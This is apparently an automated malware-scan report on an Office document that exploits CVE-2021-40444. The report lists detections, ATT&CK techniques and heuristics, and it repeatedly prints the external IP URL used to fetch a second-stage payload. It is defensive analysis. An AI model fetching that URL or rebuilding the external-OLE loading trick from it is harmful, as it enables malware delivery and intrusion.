MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1559.002 Component Object Model
The sample is a malicious OOXML document that leverages CVE-2021-40444 to load an external OLE object from the URL http://212.138.130.8/analysis.html. ClamAV also detected this file as Win.Exploit.CVE_2022_30190-9951234-1, indicating a known exploit. The embedded OLE object and external relationship strongly suggest an attempt to download and execute a secondary payload.
Heuristics 6
-
External OLEObject gadget — CVE-2021-40444 critical CVE exact CVE_2021_40444External relationship to http://212.138.130.8/analysis.html! — exploitable external OLEObject gadget pattern for CVE-2021-40444URL http://212.138.130.8/analysis.html
-
ClamAV: Win.Exploit.CVE_2022_30190-9951234-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Exploit.CVE_2022_30190-9951234-1
-
External OLE object relationship high OOXML_EXTERNAL_OLE_OBJECTDocument contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through OLE/object update paths rather than as a normal user-clicked hyperlink.URL http://212.138.130.8/analysis.html
-
External relationship medium OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: http://212.138.130.8/analysis.html!URL http://212.138.130.8/analysis.html
-
Embedded OLE object medium OOXML_OLE_OBJECTDocument contains an embedded OLE object
-
Ole10Native inner payload size exceeds remaining bytes medium OFFICE_PACKAGE_SIZE_MISMATCHThe inner `payloadSize` field declares more bytes than remain in the Ole10Native stream. Readers that allocate from this field and copy without checking are an OOB-read primitive.
Open this report in the interactive analyzer, or submit your own file for analysis.